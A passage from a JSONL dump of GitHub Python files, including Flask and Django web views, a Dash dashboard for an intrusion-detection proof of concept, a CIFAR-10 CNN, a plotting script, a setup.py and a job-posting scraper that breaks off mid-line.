render_template(\"search_id.html\", info=\"No record.\")\n row = list(x.values.tolist())\n if not row:\n return render_template(\"search_id.html\", info=\"No data found.\")\n else:\n row = row[0]\n return render_template(\"search_id.html\", header=None, length=len(row), column_names=x.columns.values, row_data=row)\n return render_template(\"search_id.html\")\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"debashish-choudhury/student-registration-form","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18119846655","text":"from core.api.serializers import AppointmentSerializer, DepartmentSerializer, DoctorSerializer\nfrom rest_framework.response import Response\nfrom core.models import Department, Doctor, Apointment\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom django.core.mail import send_mail\n\n@api_view(['POST'])\ndef add_appointment(request):\n serializer = AppointmentSerializer(data=request.data)\n print(request.data)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(\n serializer.data, \n status=status.HTTP_201_CREATED)\n\n@api_view(['GET'])\ndef get_departments(request):\n departments = Department.objects.all()\n serializer = DepartmentSerializer(departments, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET'])\ndef get_doctors(request):\n doctors = Doctor.objects.all()\n serializer = DoctorSerializer(doctors, many=True)\n return Response(\n serializer.data, status=status.HTTP_200_OK)\n\n\n","repo_name":"itsregalo/carepoint-physiotherapt-backend","sub_path":"core/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17713906871","text":"import json\nimport base64\nimport datetime\nimport requests\nimport pathlib\nimport math\nimport pandas as pd\nimport flask\nimport dash\nimport dash_table\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport plotly.graph_objs as go\nimport app.plot_helper as ph\nimport app.data_helper as dh\nimport os\n\n\nfrom dash.dependencies import Input, Output, State\nfrom plotly import tools\n\n\nglobal monitor_time_interval\nmonitor_time_interval = 60\n\n# set base app directory path\nAPP_PATH = pathlib.Path(__file__).parent.resolve()\n\n\ndh = dh.IDSData()\ndh.read_source(\"conn\")\n\nproject_branch = os.environ[\"PROJECT_BRANCH\"]\nif project_branch.endswith(\"green\"):\n project_color = \"green\"\nelif project_branch.endswith(\"blue\"):\n project_color = \"blue\"\n\n\n# Lists for Project Menu and associated Icons\nacc_str_list = [\"CONCEPT\",\n \"MONITOR TRAFFIC\",\n \"CRAWL N TRAIN\",\n \"APPLY MODEL\"\n ]\n\nsvg_icon_src = [\"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/71438.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/monitor.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/164053.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/cloud-computing.svg\"]\n\n\n### Assistance Functions for creating HTML content ###\n\ndef make_items(acc_str_list, svg_icon_src):\n '''\n Populates Bootstrap accordion Menu with sub menu sliders from given input arguments.\n The given DOM id's are crucial for app callbacks, therefore shouldn't be modified.\n\n INPUT:\n acc_str - (list) List of strings with Top Menu Bullets\n acc_slider_list - (list of lists) List of list with strings for sub Menu Slider\n OUTPUT:\n card_list - (list of dash HTML objects) Will hold all menu points and submenu slider\n '''\n card_list = []\n for acc_str, svg_icon in zip(acc_str_list, svg_icon_src):\n card_list.append(html.Div(\n id=f\"menuitem-{acc_str}\",\n children=[\n dbc.CardHeader([\n dbc.Row([\n html.Span(id=f\"spandot-{acc_str}\",\n className=\"menuicon-inactive\",\n children=[\n html.Span(id=f\"spandoti-{acc_str}\",\n style={\n \"height\": \"40px\",\n \"width\": \"40px\",\n \"background-image\": f\"url({svg_icon})\",\n \"background-repeat\": \"no-repeat\",\n \"display\": \"grid\"\n }\n )]\n\n ),\n dbc.Button(\n f\"{acc_str}\",\n id=f\"button-{acc_str}\",\n color=\"link\",\n style={\"padding-top\": 10,\n \"font-color\": \"orange\",\n \"align\": \"center\"}\n\n )\n ], className=\"menurow\",\n id=f\"row-{acc_str}\",\n style={\"display\": \"inline-flex\",\n \"align-items\": \"center\",\n \"padding-left\": 5,\n \"padding-right\": 20}\n )\n ], className=\"menucard\",\n id=f\"menucard-{acc_str}\"\n )\n ]))\n\n return card_list\n\n\n### BASIC WEB APP LAYOUT ###\n\n# NAVBAR\n\nNAVBAR = dbc.Navbar(\n children=[\n\n dbc.Row(\n [\n dbc.Col(html.A(html.Img(src=\"https://abload.de/img/bwi_dataanalyticshack7ujy4.png\",\n height=\"40px\"), href=\"https://www.bwi.de\"), width=2),\n dbc.Col(dbc.NavbarBrand(dbc.Row([\n html.P(\"BroAI\", style={\"color\": \"#FF0000\"}),\n html.P(\n \"(KI - Cyber Security)\",\n style={\n \"color\": \"orange\"}),\n html.P(\"\", style={\"margin-left\": \"15px\"}),\n html.P(\"Deployment: \" + project_branch, style={\"color\": project_color})], align=\"center\")), width=7),\n\n dbc.Col(dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem(\"blubb\",\n href=\"blubb\"),\n dbc.DropdownMenuItem(\"blubb\",\n href=\"blubb\"),\n\n ],\n nav=False,\n in_navbar=True,\n label=\"by Team NastyNULL\",\n style={\"color\": \"white\", \"font-size\": 10,\n \"font-weight\": \"lighter\"},\n ), width=2),\n\n\n ],\n align=\"center\",\n no_gutters=True,\n style={\"width\": \"100%\"}\n ),\n\n\n ],\n color=\"dark\",\n dark=True,\n sticky=\"top\",\n style={\n \"background-image\": \"url('https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/image.png')\"}\n)\n\n\n# Basic Web App Skeleton\n\nLEFT_COLUMN = dbc.Jumbotron(\n [\n html.Div(make_items(acc_str_list, svg_icon_src),\n className=\"accordion\"),\n ], style={\"padding\": \"0rem 1rem 1rem 1rem\"}\n)\n\nRIGHT_COLUMN = html.Div(id=\"right_column\", children=[\n html.Div(id=\"right_column_loading\")])\n\n\nBODY = dbc.Container([\n dbc.Row(\n [\n dbc.Col(LEFT_COLUMN, md=1),\n dbc.Col(RIGHT_COLUMN, md=11),\n ],\n style={\"marginTop\": 20},\n ),\n\n], fluid=True)\n\n\n### Functions where Plothelper and Datahelper comes together ###\n\ndef return_ip_bar_chart(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_ten_most_source_ip(file_type, timespan)\n\n return ph.plot_ten_most_ip(data_dict, title=\"\", dash=True)\n\n\ndef return_ip_bar_dest_chart(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_ten_most_dest_ip(file_type, timespan)\n\n return ph.plot_ten_most_ip(data_dict, title=\"\", dash=True)\n\n\ndef return_data_table(file_type=\"\", timespan=\"\"):\n df = dh.get_timespan_df(file_type, timespan * 60)\n\n return ph.plot_data_table(df.tail(50), fig=\"\", title=\"\")\n\n\ndef return_scatter(file_type=\"\", timespan=\"\"):\n df = dh.get_timespan_df(file_type, timespan * 60)\n\n return ph.plot_monitor_scatter(df, title=\"\", dash=True)\n\n\ndef return_world(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_longitude_latitude(file_type, timespan)\n return ph.get_world_plot(data_dict, dash=True)\n\n\ndef return_apply_table():\n df = dh.get_timespan_df(\"conn\", dh.anomaly_detection_counter + 600)\n\n pred = dh.return_anomaly_prediction(df)\n\n plot_df = df.tail(99)\n print(plot_df.shape)\n plot_df[\"Prediction_AD\"] = pred\n return ph.plot_prediction_table(plot_df, fig=\"\", title=\"\")\n\n\ndef return_anomaly_model(file_type=\"\", train_offset=\"\", counter_offset=\"\"):\n\n X_train, xx, yy, Z = dh.train_anomaly_detection(\n file_type, train_offset, counter_offset)\n return ph.plot_anomaly(X_train, xx, yy, Z)\n\n\nWORLD_MAP = \"\"\nMONITOR_SCATTER = \"\"\n\n\ntimespan_labels = [\"15min\", \"30min\", \"1h\", \"5h\", \"12h\", \"24h\"]\ntimespan_values = [15, 30, 60, 300, 720, 1440]\n\ntimespan_list = []\nfor label, value in zip(timespan_labels, timespan_values):\n timespan_list.append({\"label\": label,\n \"value\": value})\n\n\nanomaly_counter_labels = [\"5min\", \"10min\", \"15min\", \"30min\", \"1h\"]\nanomaly_counter_values = [5 * 60, 10 * 60, 15 * 60, 30 * 60, 60 * 60]\n\nanomaly_counter_list = []\nfor label, value in zip(anomaly_counter_labels, anomaly_counter_values):\n anomaly_counter_list.append({\"label\": label,\n \"value\": value})\n\n\nanomaly_span_labels = [\"3h\", \"6h\", \"12h\", \"24h\", \"48h\", \"72h\"]\nanomaly_span_values = [3, 6, 12, 24, 48, 72]\n\n\nanomaly_span_list = []\nfor label, value in zip(anomaly_span_labels, anomaly_span_values):\n anomaly_span_list.append({\"label\": label,\n \"value\": value})\n\n\nMONITOR_TIME_DROPDOWN = html.Div([\n dcc.Dropdown(id='monitor_time_dropdown',\n options=timespan_list,\n value=60), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\nMONITOR_TIME_LABEL = html.Label(\"Timespan:\",\n style={\"padding-left\": 5,\n \"padding\": 10})\n\n\nANOMALY_COUNTER_DROPDOWN = html.Div([\n dcc.Dropdown(id='anomaly_counter_dropdown',\n options=anomaly_counter_list,\n value=5 * 60), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\n\nANOMALY_SPAN_DROPDOWN = html.Div([\n dcc.Dropdown(id='anomaly_span_dropdown',\n options=anomaly_span_list,\n value=72), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\nANOMALY_LABEL = html.Label(\"Choose Anomaly Model:\",\n style={\"padding-left\": 5,\n \"padding\": 10})\n\n\n### MENU BASED CONTENT ###\n\n# CONCEPT\n\nCONCEPT = html.Img(\n src=\"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/pitch_final.png\", style={\"width\": \"100%\"})\n\n# MONITOR TRAFFIC\n\nMONITOR_FRONTEND = [dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Controls\")), dbc.CardBody(\n [MONITOR_TIME_LABEL, MONITOR_TIME_DROPDOWN])], md=1),\n dbc.Col([dbc.CardHeader(html.H5(\"Most frequently Source IPs\")),\n dbc.CardBody(dcc.Loading(\n dcc.Graph(figure=\"\", id=\"most_ip_plot\"), color=\"#FF0000\"))\n ], md=3),\n dbc.Col([dbc.CardHeader(html.H5(\"Most frequently Destination IPs\")),\n dbc.CardBody(dcc.Loading(\n dcc.Graph(figure=\"\", id=\"most_ip_dest_plot\"), color=\"#FF0000\"))\n ], md=3),\n dbc.Col([dbc.CardHeader(html.H5(\"Location of Source IPs\")),\n dbc.CardBody(dcc.Loading(dcc.Graph(figure=\"\", id=\"world_map_plot\"), color=\"#FF0000\"))])\n ]),\n dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Connection List\")), dbc.CardBody(\n html.Div(children=[], id=\"monitor_data_table\"))]),\n dbc.Col([dbc.CardHeader(html.H5(\"Connection over Time\")),\n dbc.CardBody(dcc.Loading(dcc.Graph(figure=\"\", id=\"monitor_scatter_plot\"), color=\"#FF0000\"))])\n ]),\n dcc.Interval(id='table_update', interval=1 *\n 10000, n_intervals=0)\n ]\n\n\n# CRAWLIN N TRAIN\n\nroccurve = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/Selection_006.png)\n\"\"\"\n\nroccurve_zoom = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/Selection_007.png)\n\"\"\"\n\nnn_confusion = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/nn_confusion_matrix_v1.png)\n\"\"\"\n\nrf_confusion = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/random_forest_confusion_matrix_v2.png)\n\"\"\"\n\n\ntab1_content = [dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"ROC Curves\")), dbc.CardBody(\n dcc.Markdown(roccurve, className=\"image_big\"))], md=6),\n dbc.Col([dbc.CardHeader(html.H5(\"ROC Curves Zoom\")), dbc.CardBody(dcc.Markdown(roccurve_zoom, className=\"image_big\"))], md=6), ]),\n dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Random Forest Confusion Matrix\")), dbc.CardBody(\n dcc.Markdown(rf_confusion))], md=6),\n dbc.Col([dbc.CardHeader(html.H5(\"Neuronal Network Confusion Matrix\")), dbc.CardBody(dcc.Markdown(nn_confusion))], md=6), ]),\n]\n\n\ntab2_content = dbc.Row(children=[\n dbc.Card(\n dbc.CardBody(\n [dbc.Col(children=[html.Label(\"Anomaly Counter Range:\", style={\"padding-left\": 5, \"padding\": 10}),\n ANOMALY_COUNTER_DROPDOWN,\n html.Label(\"Anomaly Span Range:\", style={\n \"padding-left\": 5, \"padding\": 10}),\n ANOMALY_SPAN_DROPDOWN,\n dbc.Button(\"Train Anomaly Detection Model\", id=\"anomaly_submit\", color=\"success\")]),\n\n\n dbc.Col(children=[dcc.Loading(dcc.Graph(id=\"anomaly_result\"), color=\"#FF0000\", className=\"loading_anomaly\")])]\n\n\n ),\n style={\"padding-top\": \"20px\", \"width\": \"80%\"}\n\n )])\n\n\nTRAINING = dbc.Tabs(\n [\n dbc.Tab(tab1_content, label=\"Random Forest & Neural Net\"),\n dbc.Tab(tab2_content, label=\"Anomaly Detection\"),\n\n ])\n\n\n# APPLY MODEL\n\nAPPLY_FRONTEND = [dbc.Row(children=[html.Div(children=[], id=\"apply_dummy\"),\n dbc.Col([dbc.CardHeader(html.H5(\"Predict Attacks\")), dbc.CardBody(html.Div(children=[], id=\"apply_data_table\"))\n ]),\n ]),\n dcc.Interval(id='apply_update', interval=1 *\n 5000, n_intervals=0),\n ]\n\n\n### WEBAPP INIT ###\n\napp = dash.Dash(__name__,\n external_stylesheets=[dbc.themes.DARKLY],\n url_base_pathname=\"/\",\n meta_tags=[\n {\"name\": \"viewport\",\n \"content\": \"width=device-width, initial-scale=1.0\"}\n ],\n )\n\napp.layout = html.Div(children=[NAVBAR, BODY])\napp.config['suppress_callback_exceptions'] = True\napp.css.config.serve_locally = True\napp.scripts.config.serve_locally = True\n\nserver = app.server\n\n\n### CALLBACKS ###\n\n\n# create anomaly model and output visualisation of isolation forest\n@app.callback(Output('anomaly_result', 'figure'),\n [Input('anomaly_counter_dropdown', 'value'),\n Input('anomaly_span_dropdown', 'value'),\n Input('anomaly_submit', 'n_clicks')])\ndef return_anomaly(counter_value, span_value, anomaly_click):\n dh.update_source(\"conn\")\n\n return return_anomaly_model(\n file_type=\"conn\", train_offset=span_value, counter_offset=counter_value)\n\n# output table with predictions\n\n\n@app.callback(Output('apply_data_table', 'children'),\n [Input('apply_update', 'n_intervals'), ])\ndef update_apply_data(n_intervals):\n dh.update_source(\"conn\")\n\n return return_apply_table()\n\n\n# update output table\n@app.callback([Output('monitor_data_table', 'children'),\n Output('most_ip_plot', 'figure'),\n Output('most_ip_dest_plot', 'figure'),\n Output('monitor_scatter_plot', 'figure'),\n Output('world_map_plot', 'figure')],\n [Input('table_update', 'n_intervals'),\n Input('monitor_time_dropdown', 'value')])\ndef update_monitor_table(n_intervals, monitor_time_interval):\n dh.update_source(\"conn\")\n return (return_data_table(\"conn\", timespan=monitor_time_interval),\n return_ip_bar_chart(\"conn\", timespan=monitor_time_interval),\n return_ip_bar_dest_chart(\"conn\", timespan=monitor_time_interval),\n return_scatter(\"conn\", timespan=monitor_time_interval),\n return_world(\"conn\", timespan=monitor_time_interval))\n\n\n# Menu control function\nacc_input = [Input(f\"menuitem-{i}\", \"n_clicks\") for i in acc_str_list]\n\n\n@app.callback(\n Output(\"right_column_loading\", \"children\"),\n acc_input,\n [State(\"right_column_loading\", \"children\")],\n)\ndef show_plot(acc_01, acc_02, acc_03, acc_04, right_children):\n '''\n This function returns the HTML content into the right column of web app based\n on the clicked accordion button and clicked submenu slider value\n '''\n ctx = dash.callback_context\n\n if not ctx.triggered:\n return CONCEPT\n else:\n element_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\n\n if (acc_str_list[0] in element_id):\n return CONCEPT\n\n elif (acc_str_list[1] in element_id):\n return MONITOR_FRONTEND\n\n elif (acc_str_list[2] in element_id):\n return TRAINING\n\n elif (acc_str_list[3] in element_id):\n return APPLY_FRONTEND\n else:\n return CONCEPT\n\n\n# controls green color of menu dot\n@app.callback(\n [Output(f\"spandot-{i}\", \"className\") for i in acc_str_list],\n [Input(f\"menuitem-{i}\", \"n_clicks\") for i in acc_str_list],\n [State(f\"spandot-{i}\", \"className\") for i in acc_str_list],\n)\ndef toggle_active_dot(n1, n2, n3, n4,\n active1, active2, active3, active4):\n '''\n Based on click events on the accordion button the style of the spandot in each accordion button\n will be updated\n '''\n\n sty_a = \"menuicon-active\"\n sty_na = \"menuicon-inactive\"\n\n ctx = dash.callback_context\n\n if not ctx.triggered:\n return sty_na, sty_na, sty_na, sty_na\n else:\n button_id = ctx.triggered[0][\"prop_id\"].split(\".\")[0]\n if (acc_str_list[0] in button_id):\n return sty_a, sty_na, sty_na, sty_na\n elif (acc_str_list[1] in button_id):\n return sty_na, sty_a, sty_na, sty_na\n elif (acc_str_list[2] in button_id):\n return sty_na, sty_na, sty_a, sty_na\n elif (acc_str_list[3] in button_id):\n return sty_na, sty_na, sty_na, sty_a\n else:\n return sty_na, sty_na, sty_na, sty_na\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True, port=8050, host=\"0.0.0.0\")\n","repo_name":"herrfeder/AI_Cybersecurity_IDS_PoC","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17971,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18899586200","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\n\nwith open('versus/bf.json', 'r') as f:\n bf = json.load(f)\n\nwith open('versus/bb.json', 'r') as f:\n bb = json.load(f)\n\nwith open('versus/bb_sparse.json', 'r') as f:\n bb_sparse = json.load(f)\n\nx = list(range(3, 14))\n\np_bf = np.polyfit(x[:len(bf)], bf, len(bf))\nbf = bf + [np.polyval(p_bf, 12), np.polyval(p_bf, 13)]\n\nplt.semilogy(x, bf, 'b', label='brute-force')\nplt.semilogy(x, bb, 'r', label='branch&bound')\n\nplt.title('Branch&Bound vs Brute-Force')\nplt.ylabel('log(secondi)')\nplt.xlabel('nodi')\nplt.legend()\nplt.grid()\n\nplt.savefig('versus/versus.png', dpi=1200)\n\nplt.semilogy(x, bb_sparse, 'g', label='branch&bound sparse')\nplt.legend()\n\nplt.savefig('versus/versus_sparse.png', dpi=1200)\n","repo_name":"mattysaints/progetto-oc","sub_path":"efficiency_plot.py","file_name":"efficiency_plot.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73019764007","text":"import numpy as np\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\nfrom random import shuffle\nfrom datetime import timedelta\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport time\nimport pickle\nimport prettytensor as pt\n\nimport cifar10\nif not os.path.exists(\"./cifar_10\"):\n os.makedirs(\"./cifar_10\")\ncifar10.data_path = \"./cifar_10\"\n\n# cifar10.maybe_download_and_extract()\n# images_train, cls_number_train, labels_train = cifar10.load_training_data()\n# images_test, cls_number_test, labels_test = cifar10.load_test_data()\n\nfrom cifar10 import img_size, num_channels, num_classes\nimg_size_cropped = 24\ntrain_batch_size = 100\nclass_names = cifar10.load_class_names()\n# CLASS_NAME\n# [0: 'airplane',\n# 1: 'automobile',\n# 2: 'bird',\n# 3: 'cat',\n# 4: 'deer',\n# 5: 'dog',\n# 6: 'frog',\n# 7: 'horse',\n# 8: 'ship',\n# 9: 'truck']\n\n\nLOGDIR = './logs/cifar_cnn/tensorboard/'\nif not os.path.exists(LOGDIR):\n os.makedirs(LOGDIR)\nMODEL_NAME = \"./saved_model/cifar_cnn/cnn_model.ckpt\"\nMODEL_DIR = \"./saved_model/cifar_cnn\"\nif not os.path.exists(MODEL_DIR):\n os.makedirs(MODEL_DIR)\n\nwith tf.name_scope('input'):\n x = tf.placeholder('float', shape=[None, img_size, img_size, num_channels], name='x')\n y_true = tf.placeholder('float', shape=[None, num_classes], name='y')\n\nglobal_step = tf.Variable(initial_value=0,\n name='global_step', trainable=False)\n\ndef pre_process_image(image, training):\n if training:\n image = tf.random_crop(image, size=[img_size_cropped, img_size_cropped, num_channels])\n\n image = tf.image.random_flip_left_right(image)\n\n # Randomly adjust hue, contrast and saturation.\n image = tf.image.random_hue(image, max_delta=0.05)\n image = tf.image.random_contrast(image, lower=0.3, upper=1.0)\n image = tf.image.random_brightness(image, max_delta=0.2)\n image = tf.image.random_saturation(image, lower=0.0, upper=2.0)\n\n # Limit the image pixels between [0, 1] in case of overflow.\n image = tf.minimum(image, 1.0)\n image = tf.maximum(image, 0.0)\n else:\n image = tf.image.resize_image_with_crop_or_pad(image,\n target_height=img_size_cropped,\n target_width=img_size_cropped)\n return image\n\n\ndef pre_process(images, training):\n # Use TensorFlow to loop over all the input images and call\n # the function above which takes a single image as input.\n images = tf.map_fn(lambda image: pre_process_image(image, training), images)\n\n return images\n\n\ndef convolution_neural_network(images, training):\n x_pretty = pt.wrap(images)\n\n # Pretty Tensor uses special numbers to distinguish between\n # the training and testing phases.\n if training:\n phase = pt.Phase.train\n else:\n phase = pt.Phase.infer\n\n with pt.defaults_scope(activation_fn=tf.nn.relu, phase=phase):\n y_pred, loss = x_pretty.\\\n conv2d(kernel=5, depth=64, name='conv_layer1', batch_normalize=True).\\\n conv2d(kernel=5, depth=64, name='conv_layer2').\\\n max_pool(kernel=2, stride=2).\\\n conv2d(kernel=5, depth=128, name='conv_layer3').\\\n conv2d(kernel=5, depth=128, name='conv_layer4').\\\n max_pool(kernel=2, stride=2).\\\n conv2d(kernel=5, depth=256, name='conv_layer5').\\\n conv2d(kernel=5, depth=256, name='conv_layer6', batch_normalize=True).\\\n max_pool(kernel=2, stride=2).\\\n flatten().\\\n fully_connected(size=2048, name='fc_layer1').\\\n fully_connected(size=1024, name='fc_layer2').\\\n softmax_classifier(num_classes=num_classes, labels=y_true)\n\n return y_pred, loss\n\ndef create_network(training):\n with tf.device(\"/cpu:0\"):\n with tf.variable_scope('network', reuse=None):\n images = x\n images = pre_process(images=images, training=training)\n\n y_pred, loss = convolution_neural_network(images=images, training=training)\n\n return y_pred, loss","repo_name":"DKhanh/VisualRecognition","sub_path":"cifarModel.py","file_name":"cifarModel.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22727160342","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.0'\n\nsetup(name='cs.portlet.calendar',\n version=version,\n description=\"Calendar portlet using fullcalendar.io\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from\n # http://pypi.python.org/pypi?:action=list_classifiers\n classifiers=[\n \"Framework :: Plone :: 5.0\",\n \"Framework :: Plone :: 5.1\",\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone portlet calendar fullcalendar',\n author='Mikel Larreategi',\n author_email='mlarreategi@codesyntax.com',\n url='https://github.com/codesyntax/cs.portlet.calendar',\n license='GPLv2',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['cs', 'cs.portlet'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n # -*- Extra requirements: -*-\n 'plone.api'\n ],\n extras_require={'test': [\n 'collective.MockMailHost',\n 'plone.app.testing',\n ]},\n entry_points=\"\"\"\n # -*- Entry points: -*-\n\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n )\n","repo_name":"codesyntax/cs.portlet.calendar","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15947803516","text":"n = int(input())\nmod = 7\n\n_n = n\ndigits = 0\nwhile _n > 0:\n n = n*10 + _n%10\n _n //= 10\n digits += 1\nn %= 10**digits\n\ncnt = 0\nfor i in range(1, 2**digits):\n candidate = 0\n _n = n\n\n while i > 0:\n if i % 2:\n candidate = candidate*10 + _n%10\n _n //= 10\n i //= 2\n\n if candidate % mod == 0:\n cnt += 1\n\nprint(cnt)\n","repo_name":"proman3419/AGH-WIET-INF-WDI-2020","sub_path":"2/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22418399405","text":"# TAPP5: Job Info to Excel\n# \n# This is inspired by my current job hunt and needing to keep all of my applications oragnized\n# This takes the url of an Indeed or LinkedIn job posting, pulls all of the relevant information\n# and puts it into an existing excel spreadsheet\n\n# To use, enter your workbook name on line 22 and run the script and paste in the indeed job url\n# Then go to https://rapidapi.com/mantiks-mantiks-default/api/indeed12 and sign up for an API key\n# Enter that API key on line 23\n# If you want to add multiple jobs, create a text file with the job urls separated by a new line and\n# enter it on line 24\n\nimport requests # used for making the call to the Indeed API\nfrom openpyxl import load_workbook # used for writing to the excel spreadsheet\nimport datetime # used for getting the current date\nfrom bs4 import BeautifulSoup # used for parsing the LinkedIn job postings\n\n\"\"\"Enter your workbook name, API key, and name of your text document with your job links\n here. I have chosen to keep them hardcoded but workbook name and the text document could\n be put into main and entered through input if you want separate workbooks for different \n job searches or have different files you want to add jobs from\"\"\"\nWB_NAME = \"YOUR_WORKBOOK_NAME.xlsx\"\nAPI_KEY = \"YOUR_API_KEY\"\njob_doc = \"YOUR_JOB_DOC.txt\"\n\ndef main():\n multiple = input('Are there multiple jobs you want to add? (y/n): ')\n if multiple.lower()[:1] == 'y': # enter if there are multiple jobs to add\n with open(job_doc) as job_links:\n for job_url in job_links:\n if \"indeed\" in job_url:\n try:\n info = get_indeed_job_info(job_url) # call the function to get the job info from the Indeed API\n enter_info(info) # call the function to enter the info into the excel spreadsheet\n except:\n print(\"Invalid url\")\n elif \"linkedin\" in job_url: # enter if the job is on LinkedIn\n try:\n info = get_linkedin_job_info(job_url) # call the function to get the job info from the LinkedIn API\n enter_info(info)\n except:\n print(\"Invalid url\")\n else:\n job_url = input('Enter the url of the job posting: ') # get the url of the job posting\n if \"indeed\" in job_url:\n try:\n info = get_indeed_job_info(job_url)\n enter_info(info)\n except:\n print(\"Invalid url\")\n elif \"linkedin\" in job_url:\n try:\n info = get_linkedin_job_info(job_url)\n enter_info(info)\n except:\n print(\"Invalid url\")\n\ndef get_indeed_job_info(job_url): # function to get the job info from the Indeed API\n job_id = job_url[job_url.index('jk=')+3:job_url.index('&vjs')] # get the job id from the url\n\n url = \"https://indeed12.p.rapidapi.com/job/\"+job_id # create the url for the Indeed API call\n\n headers = {\n \"X-RapidAPI-Key\": API_KEY,\n \"X-RapidAPI-Host\": \"indeed12.p.rapidapi.com\"\n }\n\n response = requests.request(\"GET\", url, headers=headers) # make the call to the Indeed API\n\n posting_dict = response.json() # convert the response to a dictionary\n\n job_title = posting_dict['job_title'] # get the job title\n\n company = posting_dict['company']['name'] # get the company name\n\n location_dirty = posting_dict['location'] # get the location\n location = ''.join([i for i in location_dirty if not i.isdigit()]) # remove the zip code from the location if it exists\n if \"remote\" in location.lower() and not \"hybrid\" in location.lower(): # if the job is remote, add \"Remote\" to the location\n location = \"Remote\"\n\n # get the pay range (only works if it is a pay range explicitly given by the company and it is in salary form, otherwise gives \"Unknown\")\n try:\n pay_index = posting_dict['description'].find('$') # find the index of the first dollar sign (where pay range starts)\n pay_string = posting_dict['description'][pay_index-15: pay_index+35] # get a string that includes the entire pay range\n num_string = pay_string[pay_string.find('$'):pay_string.find(\"per\")-1] # get a string that only includes the pay range\n if \"hour\" in pay_string:\n if '-' in num_string: # if the pay is given as an hourly range\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '/hour'\n elif \"From\" in pay_string or \"from\" in pay_string: # if the pay is given as an hourly minimum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '/hour+'\n elif \"To\" in pay_string or \"to\" in pay_string: # if the pay is given as an hourly maximum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = \"Up to \" + num_string.replace('$', '') + \"/hour\"\n else:\n num_string = num_string.replace('.00', '')\n pay = num_string.replace('$', '') + '/hour'\n elif \"year\" in pay_string:\n if '-' in pay_string: # if the pay is given as a salary range\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '')\n elif \"From\" in pay_string or \"from\" in pay_string: # if the pay is given as a salary minimum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = num_string.replace('$', '') + '+'\n elif \"To\" in pay_string or \"to\" in pay_string: # if the pay is given as a salary maximum\n num_string = num_string.replace('.00', '')\n num_string = num_string.replace(' ', '')\n pay = \"Up to \" + num_string.replace('$', '')\n else:\n pay = \"Unknown\"\n except:\n pay = \"Unknown\"\n\n return([job_title, company, location, pay, job_url])\n\ndef get_linkedin_job_info(job_url): # function to get the job info from the LinkedIn API\n\n response = requests.get(job_url) # get the html of the job posting\n job = response.content # convert the response to a string\n\n soup = BeautifulSoup(job, 'html.parser') # convert the string to a BeautifulSoup object\n \n job_title = soup.find('h1', 